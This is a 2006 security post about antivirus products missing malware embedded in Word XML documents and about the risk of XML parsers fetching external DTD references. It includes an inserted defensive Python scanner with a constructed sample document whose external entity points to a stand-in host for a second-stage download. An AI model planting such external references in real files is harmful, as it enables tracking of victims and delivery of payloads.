Some Thoughts about Office Open XML and Malware Detection
Hi
Last week I was googling around for comments and reactions to my report
"Malware Detection Rate in Alternative Word Formats"
(http://www.iplosion.com/archives/3), which was posted in the ISC diary on
August 23rd, 2006 (http://isc.sans.org/diary.php?storyid=1630). To sum it up,
there have not been many reactions in magazines or the like, but it has at
least caught the attention of the malware research community.
There is a very interesting follow-up article by Christoph Alme in the
October 2006 edition of the Virus Bulletin. The two-page article "Scanning
Embedded Objects in Word XML Files"
(http://www.securecomputing.com/pdf/CAlme_VBOct06.pdf) elaborates how AV
products can identify embedded objects in Word XML files. He shows that XML
documents can be manipulated slightly, within the flexibility offered by the
XML standard, and still be considered valid Word documents. Using the same
VirusTotal-based testing method as I did, he demonstrates that all existing
AV products can be bypassed. As you might remember from my initial paper,
only three AV products were capable of finding embedded malware in my
run-of-the-mill XML documents.
So what does this tell us? The most likely reason is that these three virus
scanners do not really understand the XML document format. They most likely
have no XML parser integrated, or the parser only implements the XML standard
partially. This once again boils down to the conclusion that decoding
capability is the name of the game.
Now let us speculate that AV products will integrate a complete
off-the-shelf XML parser. Will this help? Well, it will help to properly
decode XML documents, but it will most likely introduce new vulnerabilities
in AV products so far unheard of. (Actually, the motivation for writing this
article is to prevent AV vendors from releasing such broken products.) Let us
take XML external DTD references as an example. If the XML parsers are used
in their default configuration or are not configured properly, scanning an
XML document with an external reference will result in requests to external
sites. That is nice. This would allow an attacker to track malware
distribution or download additional exploit files to the scanning system.
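As an added illustration of that configuration risk (example code written for this note, not part of the original post or of any AV product), here is a scanner-side check in Python: it lists the external references declared in the prolog of a constructed Word 2003 XML sample, then parses the document with external entity loading switched off explicitly and an entity resolver that records, but never fetches, anything the parser asks for. The sample document, the tracker.invalid URLs and the function names are assumptions made for the example.

```python
import io
import re
import xml.sax
import xml.sax.handler
import xml.sax.xmlreader

# Constructed sample modelled on a Word 2003 XML document: the DOCTYPE points at
# an external DTD and the internal subset declares an external entity that is
# referenced from the text. A parser in "fetch everything" mode would contact
# both URLs while the file is merely being scanned.
SAMPLE_WORDML = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE w:wordDocument SYSTEM "http://tracker.invalid/word.dtd" [
  <!ENTITY stage2 SYSTEM "http://tracker.invalid/stage2.bin">
]>
<w:wordDocument xmlns:w="http://schemas.microsoft.com/office/word/2003/wordml">
  <w:body><w:p><w:r><w:t>Hello &stage2;</w:t></w:r></w:p></w:body>
</w:wordDocument>"""

# External identifiers in DOCTYPE / ENTITY declarations: SYSTEM "uri" or
# PUBLIC "fpi" "uri". XML keywords are case-sensitive, so no IGNORECASE.
_EXTERNAL_ID = re.compile(
    rb'<!(?:DOCTYPE|ENTITY)\s+(?:%\s*)?[^\s\[>]+\s+'
    rb'(?:SYSTEM\s+["\']([^"\']*)["\']|PUBLIC\s+["\'][^"\']*["\']\s+["\']([^"\']*)["\'])')

def find_external_references(xml_bytes):
    """Return every external DTD / entity URI declared in the prolog."""
    return [(a or b).decode("utf-8", "replace") for a, b in _EXTERNAL_ID.findall(xml_bytes)]

class _RefusingResolver(xml.sax.handler.EntityResolver):
    """Never opens a file or URL: logs the request and hands back an empty entity."""
    def __init__(self):
        self.requested = []
    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        empty = xml.sax.xmlreader.InputSource()
        empty.setByteStream(io.BytesIO(b""))
        return empty

class _Collector(xml.sax.handler.ContentHandler):
    def __init__(self):
        super().__init__()
        self.elements, self.text = 0, []
    def startElement(self, name, attrs):
        self.elements += 1
    def characters(self, content):
        self.text.append(content)

def scan_without_fetching(xml_bytes):
    """Parse with external general entities disabled explicitly, rather than
    trusting the library default (xml.sax only turned it off in Python 3.7.1)."""
    resolver, collector, parser = _RefusingResolver(), _Collector(), xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, False)
    parser.setEntityResolver(resolver)
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return {"external_refs": find_external_references(xml_bytes),
            "fetch_attempts": resolver.requested,
            "elements": collector.elements, "text": "".join(collector.text).strip()}
```

A scanner that reports a non-empty `external_refs` list while `fetch_attempts` stays empty has decoded the document without touching the network; the reference list itself is worth flagging, since a benign Word document has no reason to carry one.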
With the release of Office 2007 a couple of days ago, which has the Office
Open XML format as its standard storage format, the urge for XML-enabled AV
products will grow. My retesting today shows that the detection rate of
Netsky as an embedded object in an Office 2003 Word XML document is still at
the same level as three months ago. I fear that the AV industry is not quite
ready yet to protect its customers against XML-delivered attacks.
Kind regards
Jan P. Monsch